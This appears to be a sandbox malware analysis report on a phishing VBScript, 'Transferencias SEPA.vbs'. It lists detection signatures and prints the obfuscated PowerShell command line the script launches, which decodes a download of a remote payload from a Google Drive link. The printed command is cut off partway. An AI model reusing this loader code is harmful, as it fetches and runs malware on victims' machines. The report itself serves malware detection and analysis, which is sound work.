Edit tour
Windows
Analysis Report
Transferencias SEPA.vbs
Overview
General Information
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 2700 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Trans ferencias SEPA.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6536 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Undervis ningsdiske tterne = 1 ;$Straffer ammen='Sub strin';$St rafferamme n+='g';Fun ction Toxo philism87( $Sanerende s){$Uneath =$Sanerend es.Length- $Undervisn ingsdisket terne;For( $Vacciners =5; $Vacci ners -lt $ Uneath; $V acciners+= (6)){$Ceyl onite+=$Sa nerendes.$ Strafferam men.Invoke ($Vacciner s, $Underv isningsdis ketterne); }$Ceylonit e;}functio n anthropo metry($Reg istrating) {& ($Bot hroi) ($Re gistrating );}$Gimmer lams=Toxop hilism87 ' Ke neMNove lo TarszEb onii Nonsl MadrelOm k iaFiske/Lu ffi5,isun. algn0Fagb l Micon( R e lWvejovi .ecannFilm adDockioSt udewGhi es Ogre. .roc aNReal TUn con S,kke1 pars0Gste h.Ublod0,r isv; ata M ,croW Smnd iCatapnBef ly6Ext.a4E xpos;Lande LaissxKol on6Habit4T andb;Suppe BrndrGlor iv Sel,: B uke1Latin2 S,eat1Baan d. col,0Ov erm)Cloch vavtoGFodb oeRichec.e llmkwhango ,leuk/fo,o k2Nim u0Fe sts1.eesf0 Thema0Skru m1Marin0Il yas1Attr, GodfFPassa inon rrMod e.eBromdfA andeoMoped xRe ri/haa nd1Pht.i2E xtem1T,lsp .Broug0Kas ke ';$Nytt endes=Toxo philism87 ' SpapUDam pis.orpueB rugerLabio -PhymaAKll ingwergieK arklnHexad tIr,ny ';$ Fraraadede =Toxophili sm87 'Tent ah Fientha restTrstep Fa,cisLenn a: Guns/fa bri/Underd UnderUred iiMilitvT, ereeAssyr. Herm gHu o eoOx dioFl elsgHornyl Row,ieSter e.Realkc G refo Tallm unend/stat suBa.sacco lle? T.nde Pejlix Kie fpDovneoOu tmarNuchat U,ndf=Quan tdJiliaoIn terwTalern Bjlenl Mid to Tilpa D iskdTakof& Overislen ,dElevr=Un pro1 reabq hovedL Bev ilDis.erBr and6EkspaC Cho.diUdv, kWHexadFPi perPB,kseD SpermuGymn oLFu.iofHa lvfJZucc,c A keruUn,h uC Assap o r aG lami8 Photo-Tiem aGStemmkou tglYTrbesK FyrsiTapp exUfor hov erbbBarflz taktlaIndd k ';$Pjank ede=Toxoph ilism87 'G rune>Trste ';$Bothro i=Toxophil ism87 'uno beiCereve AlarxBrock ';$Perfek tibilitet = Toxophil ism87 'Cen tueFla.kcA ssonhScene oDil t Di. ul%.ianoaS ubmupMarko pErhvedNon ira,ndettS hutoa acch %R,mod\Pr teFC,ntrlQ u nod.eave eAlderkG l geaTulreg IslneB fan rForur.Sam fuCTaxikop reponVarme P.dal& an dm&Coc f M ikreTapnec P,eudhSpor ioDezin Fr ike$ ncon ';anthropo metry (Tox ophilism87 'Poka,$Aa rstgTillgl g,bisoBrev sbStrigaSy nsol Pal : SannalKulh yi FrigqSt aalu E,evo Univ rJuv. ni Vands K jerhSkrmt= Fors( Abl acAbr,kmNo nredSuper Sipun/ Svi ncSanct Ja que$,iltrP AkemeFust irNarkofBl udge Varmk MiljbtFoll eiModstbSw erviYe.sel Fab,liLder rtPropie B eket,oist) Anemo ');a nthropomet ry (Toxoph ilism87 'C st.d$Ens,a gPhenolSen suoSyddab b fia,ocia lFnull: Pr anUDebitnN arcodF ldm eonsetrSha ftv UkorgS pitftUntol iM rragSan gshTolv,e Tyr,dAtomu sC,lic1arb ej3Fo ge4E neba=Brunk $StokeFNed s,rClewkaB acksrUi,en aMaxima Re cidS,oene